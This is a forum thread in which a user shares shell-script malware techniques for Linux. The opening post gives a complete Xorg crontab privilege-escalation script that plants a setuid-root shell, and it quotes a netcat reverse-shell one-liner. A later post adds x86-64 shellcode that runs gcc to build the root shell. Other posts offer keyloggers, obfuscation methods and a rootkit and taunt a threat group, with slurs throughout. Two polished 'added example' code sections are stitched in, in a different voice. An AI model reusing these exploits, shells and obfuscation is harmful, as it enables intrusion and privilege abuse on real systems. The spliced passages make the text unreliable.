
Sh/Bash based malware for *Nix.

  1. #1
    Sophie Pedophile Tech Support
    Welcome to another edition of Sophie's Cyber Shenanigans. In this thread I've got some unconventional ways to work on *Nix-based malware, and a couple of questions for the level 97 shell script wizards.

    So I am experimenting with shell scripts to find out what is and isn't viable should I want to create shell-script-based malware for loonix. Why shell script? They're easily obfuscated, a bunch of utils have PE/static binary formats you can bring along or deploy remotely, and all distros have `Sh` and almost always `Bash`, as far as I am aware.

    What's more, shell scripts allow one to invoke commands and operations from any scripting lang that has its interpreter installed 'out of the box' on the distro you are targeting, which tends to be quite a few.

    Chances are you'll have access to: Perl, Python, Lua, Tclsh, M4 (plus other macro 'langs') and, if you're lucky, PHP, Ruby, Node and so on and so forth.

    Another benefit of using `Sh` or `Bash` is that you don't have to worry about compatibility issues. Should you want to make use of payloads written in, let's say, C, you have the opportunity to perform recon simply with the `uname -svm` command, and then you'll have the proper architecture and kernel version, which is great to know if you want to write an exploit for the system you're on.

    Here's an example.


    #!/bin/bash


    # There are a bunch of vulns in the Xorg server and related utils like
    #
    # X.Org xorg-x11-xfs - Local Race Condition
    # xorg-x11-server - 'inittab' Local Privilege Escalation
    #
    # And much more, we're gonna do the second one as an example
    #
    # When ##!!## occurs in the script i got some annotations below
    #
    cat << EOF > /tmp/x_orgasm
    cp /bin/sh /usr/local/bin/pwned ##!!##_1
    echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
    gcc /tmp/pwned.c -o /usr/local/bin/pwned ##!!##_2
    chmod 4777 /usr/local/bin/pwned
    EOF

    chmod +x /tmp/x_orgasm


    # prepare your anus
    cd /etc
    Xorg -fp "* * * * * root /tmp/x_orgasm" -logfile crontab :1 & ##!!##_3
    sleep 5
    pkill Xorg ##!!##_4

    sleep 120

    ls -l /etc/crontab*
    ls -l /usr/local/bin/pwned

    # Start elevated Sh
    /usr/local/bin/pwned


    ##!!##_1
    Before you say "you can't just copy /bin/sh": well, we don't really need to; the line after that builds a Sh shell too.
    If you're afraid we won't have permissions for `gcc`, here's something that'll do exactly the same with UID 0.


    Alternatively we could ship a shell in Asm with the payload up top.

    ##!!##_2

    /tmp and some of the other directories featured here get mounted as NOSUID, which is good, because NOSUID beats root.

    /usr/local/bin is part of the $PATH and has MODE 2775/drwxrwsr-x


    ##!!##_3

    The operation here is what triggers the bug. Without getting too much into the weeds: killing Xorg at ##!!##_4 with pkill will cause inittab to restart the cronjob related to Xorg that we changed with the operation we ran previously, which then starts our 'pwned' Sh with root privileges.

    Obfuscation

    There are tools to obfuscate bash, which is great. Here's an example of this same script obfuscated with the methods below.


    String/Hex Hash, 1 Iteration
    Token/ForCode, 1 Iteration


    Find the result here

    Or if you prefer a picture check the spoiler out below.




    Anyway, I hope you found that informative. However, before you go I do actually have a question for the level 97 shell script wizards.

    I want to have a function in a shell script that I can call with different commands, so `cmd_func cat /etc/passwd`. My current implementation looks like this:


    #!/usr/bin/env -S sh\_"umask\_700"\_-f
    # BTW This is legal right ^
    #
    # I'm U_masking because i am writing stuff out
    # Under a specific user account

    buff_ops()
    { # I want to run it through a FIFO pipe/buffer in fact it is a requirement.
    cmd=$0
    arg=$1
    mknod u_dev p && cat < `read -t (${cmd $'\0' arg})` 0<u_dev | /bin/bash 1>u_dev
    };

    buff_ops CMD ARG # <- is what i want


    I figured it should be good since stuff like this works also:

    rm -f x; mknod x p && nc 192.168.1.10 1337 0<x | /bin/bash 1>x


    Thicc threads niggas. One on low level security and dev incoming soon as well.
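An added example, not code from the original post: what a FIFO-backed `buff_ops` looks like when it works. Two things differ from the version in the post. The command line is taken from `$1` onward rather than `$0` (which holds the script or shell name), and the command and its output travel over two separate FIFOs, because here the caller sits on both ends of the pipe; the `nc ... 0<x | /bin/bash 1>x` pattern gets away with one FIFO only because nc holds the other end. It assumes POSIX sh plus mkfifo and mktemp from coreutils; the worker shell is /bin/sh and nothing touches the network.

```shell
#!/bin/sh
# Added example (not from the original post): a FIFO-backed "run this
# command" function. Assumes POSIX sh, mkfifo, mktemp; worker is /bin/sh.

# shell_quote: print "$@" as single-quoted words so the worker shell
# re-parses them into the same argv (trailing newlines in an argument
# are not preserved, which is fine for a command line).
shell_quote() {
    local a
    for a in "$@"; do
        printf "'%s' " "$(printf '%s' "$a" | sed "s/'/'\\\\''/g")"
    done
}

# buff_ops CMD ARG...: hand the command line to a worker shell through
# one FIFO and read its output back through a second one. The function
# returns the worker's exit status, i.e. the status of CMD.
buff_ops() {
    local dir in out worker rc
    dir=$(mktemp -d) || return 1
    in="$dir/in"; out="$dir/out"
    mkfifo -m 600 "$in" "$out" || { rm -rf "$dir"; return 1; }

    # Worker: stdin from $in, stdout+stderr to $out. open() on a FIFO
    # blocks until the other end is opened, so it waits for the writer
    # and reader below; nothing has to be ordered by hand.
    /bin/sh <"$in" >"$out" 2>&1 &
    worker=$!

    # Writer: one quoted command line, then EOF (the subshell closes $in,
    # so the worker reads end-of-file and exits after running it).
    { shell_quote "$@"; printf '\n'; } >"$in" &

    # Reader: drains $out until the worker exits and closes it.
    cat "$out"

    wait "$worker"; rc=$?
    rm -rf "$dir"
    return "$rc"
}

# Demo when run directly.
buff_ops printf '%s\n' 'hello world' 'from a fifo'
```

The quoting step is what makes `buff_ops cat /etc/passwd` and `buff_ops echo "it's here"` both arrive intact; without it, the worker shell would re-split and re-expand whatever it reads from the pipe.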
  2. #2
    Cowboy2013 Houston
    I know a little about Python. Do you have any keyloggers that would email to any email? Preferably something besides Gmail.

    And is there any way to get something to autorun on Windows without an Arduino? With a flash drive or DVD?
  3. #3
    Sophie Pedophile Tech Support
    Originally posted by Cowboy2013 I know a little about Python. Do you have any keyloggers that would email to any email? Preferably something besides Gmail.

    And is there any way to get something to autorun on Windows without an Arduino? With a flash drive or DVD?

    Yes and yes.
  4. #4
    Sophie Pedophile Tech Support
    I also have a keylogger that'll send you the data over UDP, one byte at a time, which is good because that makes it stealthier. Would you like some random malware, sir? I got malware out the ass, custom made by yours truly, OSS, and BH.

    We'll do luck of the draw. I'll number 10 random malwares, you pick a number. Ready?


    rand=$(( RANDOM % 10 )) && echo "$rand"



    Anyway, I wish more people would be interested or competent in terms of *Nix malware.
  5. #5
    Sophie Pedophile Tech Support
    I'm an inspiration to Threat Actors all around the world.

    https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera

    Sh/Bash based malware is the future of loonix malware. Using native utils for offensive operations is almost always superior to shipping in a whole ass malware, especially with regard to Linux: no compatibility issues. It's great.
  6. #6
    troon Houston
    In the xorg hack, why do you bother with the cp of /bin/sh when you already write that with gcc and chmod it?
  7. #7
    Sophie Pedophile Tech Support
    Originally posted by troon In the xorg hack, why do you bother with the cp of /bin/sh when you already write that with gcc and chmod it?

    Redundancy.
  8. #8
    Sophie Pedophile Tech Support
    Also TeamTNT, if you're reading this. Don't download your payloads from a C2 server that literally has the name of the Operation in the domain. And, you guys need to obfuscate that shell script. I got a couple really good ways among my TTPs but if i share them they won't be as effective any more.

    I can design a new Obfuscation method however. And you guys should be able to as well, if you can't i'll trade a custom designed method, for something of equal value. Preferably 0day. Ok admittedly that's a steep price.

    All of this is for legitimate research purposes of course.

    edit: Oops * shell script not shell code lol
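The OP lists a "String/Hex Hash" pass among the methods applied to the script. The following is an added example, not the output of the tool the OP used and not the TeamTNT script: a one-layer string-escape wrapper of that general kind, the stub it emits, and the one-liner a defender uses to reverse it. It assumes POSIX sh plus od, grep -o and tr; the sample script is constructed for this page.

```shell
#!/bin/sh
# Added example (not from the original post or the OP's tool): a one-layer
# string-escape obfuscator for shell scripts, and its unwrapper.
# Assumes POSIX sh plus od, grep -o and tr.

# obfuscate: read a script on stdin, print a stub that rebuilds it from
# octal escapes at run time and evals it. Octal rather than \xHH because
# POSIX printf only guarantees \ddd in the format string.
obfuscate() {
    local o esc
    esc=
    for o in $(od -An -to1 -v); do
        esc="$esc\\$o"
    done
    printf 'eval "$(printf %s)"\n' "'$esc'"
}

# unwrap: the defender's side. Pull every \ddd out of a stub and decode it.
# printf scans its format once, so a decoded % never becomes a directive.
unwrap() {
    local esc
    esc=$(grep -o '\\[0-7][0-7][0-7]' | tr -d '\n')
    printf "$esc"
}

# Constructed sample script; it deliberately contains % and \n, the two
# characters most likely to break a naive printf-based wrapper.
SAMPLE='printf "%s-%s\n" alpha beta'

stub_for_sample() { printf '%s' "$SAMPLE" | obfuscate; }
run_sample_stub() { sh -c "$(stub_for_sample)"; }
unwrap_sample_stub() { stub_for_sample | unwrap; }

# When run directly: show the stub, what it does, and the recovered source.
stub_for_sample
run_sample_stub
unwrap_sample_stub; echo
```

Nothing readable survives in the stub (no `alpha`, no `printf`), which is all a single layer buys: the `eval "$(printf ...)"` shape is itself a signature, and `unwrap` recovers the source without executing anything. Stacking layers (the OP's "1 Iteration" counts) only changes how many times the same extraction has to be run.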
  9. #9
    troon Houston
    Originally posted by Sophie Redundancy.

    It doesn't add anything to the hack. Either you've got an exe that setuid(0) or you don't. I don't get what you mean.
  10. #10
    Sophie Pedophile Tech Support
    Originally posted by troon In the xorg hack, why do you bother with the cp of /bin/sh when you already write that with gcc and chmod it?

    Sometimes this happens.


    cp /bin/sh /usr/local/bin/pwned
    cp: cannot create regular file '/usr/local/bin/pwned': Permission denied
  11. #11
    troon Houston
    Originally posted by Sophie

    cp /bin/sh /usr/local/bin/pwned
    cp: cannot create regular file '/usr/local/bin/pwned': Permission denied

    In which case, you'd also get this from the gcc line.


    /usr/bin/ld: cannot open output file /usr/local/bin/pwned: Permission denied


    I still don't get it.
  12. #12
    Sophie Pedophile Tech Support
    If you look closely at this part:


    cat << EOF > /tmp/x_orgasm
    cp /bin/sh /usr/local/bin/pwned ##!!##_1
    echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
    gcc /tmp/pwned.c -o /usr/local/bin/pwned ##!!##_2
    chmod 4777 /usr/local/bin/pwned
    EOF


    You can tell that the operation above writes out everything between the EOFs to the /tmp directory, after which it's made executable with chmod +x. That means it can be run as a shell script.

    Here we are making sure that the cronjob related to Xorg, which has the permissions required, will start the script in /tmp with the permissions we need.


    cd /etc
    Xorg -fp "* * * * * root /tmp/x_orgasm" -logfile crontab :1 & ##!!##_3
    sleep 5
    pkill Xorg


    Once the script is executed with the new permissions we can do the operations defined there without issue.

    Even if something goes wrong I write this:



    ; execve("/////usr/bin/gcc", ["/////usr/bin/gcc", "/tmp/pwned.c", "-o", "/usr/local/bin/pwned"], [NULL])
    ; x86-64 Linux. Strings are pushed as little-endian qwords, NUL-terminated
    ; by the zero in rdx; the ones that would contain 0x00 bytes are stored
    ; inverted (mov + not) so the encoded bytes contain no NULs.
    global _start
    section .text

    _start:
    push 59                          ; rax = 59 = SYS_execve
    pop rax
    cdq                              ; rdx = 0 (eax is positive); reused as NUL/NULL
    push rdx                         ; terminator for the path string
    mov rbx, 0x6363672f6e69622f      ; "/bin/gcc"
    push rbx
    mov rbx, 0x7273752f2f2f2f2f      ; "/////usr" (leading slashes pad to 8 bytes)
    push rbx
    push rsp                         ; rdi = &"/////usr/bin/gcc" (pathname, argv[0])
    pop rdi
    push rdx                         ; terminator for argv[1]
    mov rbx, 0xffffffff9cd19b9a      ; ~"ed.c"
    not rbx
    push rbx
    mov rbx, 0x91888fd08f928bd0      ; ~"/tmp/pwn"
    not rbx
    push rbx
    push rsp                         ; r8 = &"/tmp/pwned.c" (argv[1])
    pop r8
    push rdx                         ; terminator for argv[2]
    mov rbx, 0xffffffffffff90d2      ; ~"-o"
    not rbx
    push rbx
    push rsp                         ; r9 = &"-o" (argv[2])
    pop r9
    push rdx                         ; terminator for argv[3]
    mov rbx, 0xffffffff9b9a9188      ; ~"wned"
    not rbx
    push rbx
    mov rbx, 0x8fd091969dd0939e      ; ~"al/bin/p"
    not rbx
    push rbx
    mov rbx, 0x9c9093d08d8c8ad0      ; ~"/usr/loc"
    not rbx
    push rbx
    push rsp                         ; r10 = &"/usr/local/bin/pwned" (argv[3])
    pop r10
    push rdx                         ; NULL: argv terminator and the only envp entry
    push rsp                         ; rdx = envp (points at that NULL: empty env)
    pop rdx
    push r10                         ; build argv[] on the stack, last element first
    push r9
    push r8
    push rdi
    push rsp                         ; rsi = argv
    pop rsi
    syscall


    What that does is invoke gcc with execve with UID 0, so the shell we wrote out with


    echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c


    gets compiled the way we want to regardless of system permissions.
  13. #13
    Sophie Pedophile Tech Support
    It's not called exploits for nothing (n_n")
  14. #14
    troon Houston
    Originally posted by Sophie It's not called exploits for nothing (n_n")

    You don't have a fucking clue what you're talking about, do you?
  15. #15
    Sophie Pedophile Tech Support
    Originally posted by troon You don't have a fucking clue what you're talking about, do you?

    Last I checked you were the one that was asking a million questions about the subject at hand. See those four 'thanks' my post got? Those are from people who definitely know what they are talking about. Just because you're too fucking ignorant to understand what's going on in this thread doesn't mean that everyone is as incompetent as you. I even fucking spelled it out for you. If everyone else here understands the subject matter, then maybe you should consider that you're actually the one that doesn't have a fucking clue.

    Why don't you shut the fuck up, read up on offensive security and shell scripting, and look into the vulnerability I mentioned in the OP. Then come back and talk shit to me.
  16. #16
    hydromorphone victim of incest [insincerely conduce my paisley]
    I wish I had more time for shit like this
    The things you regret at the end and why lol irony is a bitch
  17. #17
    troon Houston
    Originally posted by Sophie Last i checked you were the one that was asking a million questions … <crap> … I even fucking spelled it out for you

    You spelled fuck all out. You were talking total shit. Because you know shit.

    "Also, TeamTNT..." - you are having a fucking laugh. Or retarded, not sure yet.
  18. #18
    MLT Yung Blood
    nice Xorg vuln, is it a zero-day? I've never seen it before.. if it's 0day then damn nice :P

    also, nice thread in general. I've got a ring3/userland Linux rootkit based on DR0 (debug register, as opposed to LD_PRELOAD / dynamic linker) which I'll post tomorrow... it's multi-arch too (inline asm for each architecture.. it'll use uname -m or /proc entries to detect the architecture in use, then run the relevant arch-specific inline assembly from there).
    Also, I said it's userland... well, that's not fully true. It's also active in kernelspace. It's just residing in userland/ring3 rather than at ring0, so that if the fucker updates their kernel they're still hooked. So basically it's living in userland but is performing ring3->ring0 hooking.
    I suck dick at C(++), ASM, and kernel stuff in general... so I'm actually really fucking happy with how this kit has been coming along. It's only the 2nd kit I ever wrote too. First used LD_PRELOAD.

    The bash obfuscation you posted has inspired me to post a thread detailing a bunch of my bash obfuscation tricks, too :)


    EDIT:
    lol... do we know each other btw? If so, who are you? PM if you don't wanna reveal your nick here.
    Just noticed you posted this https://niggasin.space/thread/5020 (that fuzzer is incredibly gross btw lmao, wrote it for the memez, hence the goto(); spaghetti code, zero bounds checks anywhere, and user inputs passed to syscalls errywhere. I wrote a proper flash fuzzer in Ruby. I'll upload that one for you. It uses the same lists, but it opens proper sockets etc rather than doing fucking gnome-www-browser loool)
  19. #19
    troon Houston
    Are you maybe a schizo-posting pedo?

    A zero day multi-arch ring3 to ring0? I fucking wait with bated breath.

    I'm not sure whether to laugh or cringe.
  20. #20
    troon Houston
    I got a DoS zero-day in a single line of pure bash script:


    sudo shutdown -h now


    Let me walk you through it.

    The 'sudo' command does stuff.

    The 'shutdown' command is self-explanatory. It shuts things down.

    The '-h' is what we call a 'flag', but I've seen it referred to as a 'parameter'.

    And the 'now' command is in there, but I don't really know what it does. DO NOT OMIT IT OR THE HACK WILL NOT WORK.

    If it asks for a password, then you're on your own. I can't help you on that bit.

    Oh, if anyone from Fin7 is reading this, can you pick up a carton of semi-skimmed from the shops on your way home?

    You're all welcome.